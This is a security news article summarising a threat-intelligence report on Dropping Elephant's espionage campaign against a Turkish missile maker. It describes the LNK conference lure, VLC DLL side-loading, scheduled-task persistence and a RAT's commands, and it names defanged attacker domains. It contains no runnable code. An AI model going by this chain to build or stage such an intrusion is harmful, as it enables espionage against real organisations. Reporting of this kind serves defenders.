Dropping Elephant Targets Türkiye’s Missile Industry with Stealthy Conference Lures & VLC DLL Sideloading

Arctic Wolf Labs has uncovered a new cyber-espionage campaign orchestrated by the threat actor Dropping Elephant, targeting Türkiye’s defense industrial base—specifically a manufacturer of precision-guided missile systems. The operation leverages weaponized conference lures, DLL side-loading, and custom shellcode loaders to silently exfiltrate intelligence data, all under the guise of legitimate software and institutions.

The campaign coincides with intensified Türkiye-Pakistan defense collaboration and growing regional tensions with India, suggesting a geopolitically motivated operation. The primary victim is a prominent Turkish contractor involved in missile and hypersonic weapon development.

“This targeting occurs as Türkiye commands 65% of the global UAV export market and develops critical hypersonic missile capabilities, while simultaneously strengthening defense ties with Pakistan,” the report writes.

Suspected to be of Indian origin, Dropping Elephant has a history of cyber-espionage dating back to 2015. Their tactics blend social engineering, watering-hole attacks, and malicious apps to infiltrate targets. Previous malware includes VajraSpy and BADNEWS RAT.

“The group has since expanded its sights to include victims worldwide… particularly focusing on individuals, organizations, and sectors with diplomatic and economic ties to China,” the report states.

The attack begins with a seemingly benign conference invitation:

1. Stage 1: LNK File Delivery
   1. The file, named Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.lnk, is a shortcut that launches PowerShell commands upon execution.
2. Stage 2: Distraction and Download
   1. A fake PDF resembling a real conference flier from waset.org is used to distract the victim while malware is silently fetched from the spoofed domain expouav[.]org.
3. Stage 3: DLL Side-Loading via VLC Player
   1. Dropping Elephant uses a legitimate vlc.exe and a renamed libvlc.dll to stealthily execute shellcode. The use of trusted software like VLC plays on the user’s familiarity and bypasses basic security filters.
4. Stage 4: Persistence and Execution
   1. A scheduled task is created using a disguised Microsoft Task Scheduler binary (schtasks.exe) to ensure the malware persists across reboots. “The scheduled task executes a legitimate VLC Player file which runs a DLL. The DLL acts as a shellcode loader that decrypts the ciphertext shellcode stored in vlc.log,” the report notes.
5. Stage 5: Payload Decryption and Execution
   1. The final payload is a custom x86 Remote Access Trojan (RAT) that performs system reconnaissance, takes screenshots, collects metadata, and exfiltrates to the command-and-control server roseserve[.]org.

Once executed, the malware conducts deep reconnaissance on the host system:

• Takes screenshots and saves them as JPGs
• Captures system name, user name, and firmware info
• Detects sandbox environments to avoid analysis

The attackers have shown a deep understanding of Türkiye’s tech ecosystem by mimicking institutions such as:

• Pardus (a Turkish Linux distro) at roseserve[.]org
• Anadolu Agency, a major Turkish news outlet

“This choice demonstrates cultural and technical knowledge of the technology landscape in Türkiye, and the country’s technological independence.”

The custom payload includes commands like:

• 3Up3: Downloads and executes additional malware
• 3SC3: Captures screenshots
• 3gjdfghj6: Executes shell commands via cmd.exe
• 3APC3: Shellcode loader leveraging QueueUserAPC

These functions allow the threat actor to extend capabilities dynamically based on real-time reconnaissance.

Compared to previous Dropping Elephant campaigns, the new payload represents an evolution in stealth and performance:

“Diversification from x64 DLL to x86 PE architecture, with reduced library dependencies… command parsing in the new version is done with raw code, while the old version used the ‘C function’ – memcmp.”

Related Posts:

• Operation Sea Elephant Cyber-Espionage Campaign Targeting South Asia
• Stealth in Pixels: .NET Malware Hides Payloads in Bitmap Resources
• VLC media player received patches for zero-day in open-source library
• VLC Media Player Patches Two Vulnerabilities: Users Urged to Update Immediately
• VLC Media Player Update Needed: CVE-2024-46461 Discovered